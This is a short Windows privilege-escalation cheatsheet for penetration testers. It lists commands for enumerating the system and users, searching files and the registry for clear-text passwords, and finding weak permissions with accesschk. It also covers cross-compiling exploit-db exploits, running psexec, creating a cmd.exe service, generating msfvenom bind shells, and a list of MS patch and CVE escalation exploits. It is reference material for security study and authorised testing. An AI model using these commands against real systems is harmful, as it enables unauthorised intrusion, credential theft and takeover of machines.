Penetration Testing 102 - Windows Privilege Escalation Cheatsheet

OS and service pack

  • systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

  • ver

System name

  • hostname

Who are you?

  • whoami

  • echo %username%

Finding other users

  • net users

  • net user username

Clear-text passwords

  • c:\unattend.txt

  • c:\sysprep.ini - [Clear Text]

  • c:\sysprep\sysprep.xml - [Base64]

  • findstr /si password *.txt *.xml *.ini

  • reg query HKLM /s | findstr /i password > temp.txt

  • reg query HKCU /s | findstr /i password > temp.txt

  • reg query HKLM /f password /t REG_SZ /s

  • reg query HKCU /f password /t REG_SZ /s

Finding weak directory permissions

  • accesschk.exe /accepteula

  • accesschk.exe -uwdqs users c:\

  • accesschk.exe -uwdqs "Authenticated Users" c:\

Finding weak file permissions

  • accesschk.exe -uwqs users c:\*.*

  • accesschk.exe -uwqs "Authenticated Users" c:\*.*

  • cacls "c:\Program Files" /T | findstr Users

Weak Service permissions

  • accesschk.exe -uwcqv *

Cross compile exploits

  • cp /usr/share/exploitdb/platforms/windows/local/<exploit>.c /tmp/

  • cd /root/.wine/drive_c/MinGW/bin

  • wine gcc -o w00t.exe /tmp/<exploit>.c -l lib

PSexec

  • psexec.py <user>@<host> <cmd>

  • psexec.exe \\<host> <cmd>

Services

  • sc create <servicename> binpath= "c:\windows\system32\cmd.exe /k <pathtobinaryexecutable>" DisplayName= <displayname>

  • sc start <servicename>

Creating bind shells

  • msfvenom -p windows/shell_bind_tcp -f exe -o <Filename.exe> LPORT=<BindPort>

  • msfvenom -p windows/shell_bind_tcp -f dll -o <Filename.dll> LPORT=<BindPort>

Privilege Escalation Exploits by Patch

  • MS10-015

  • MS10-059

  • MS10-092

  • MS11-080

  • MS13-005

  • CVE-2013-3660

  • MS13-053

  • MS13-081

  • MS14-058

  • MS14-068

  • MS14-070

  • MS15-001

  • MS15-051

  • MS15-052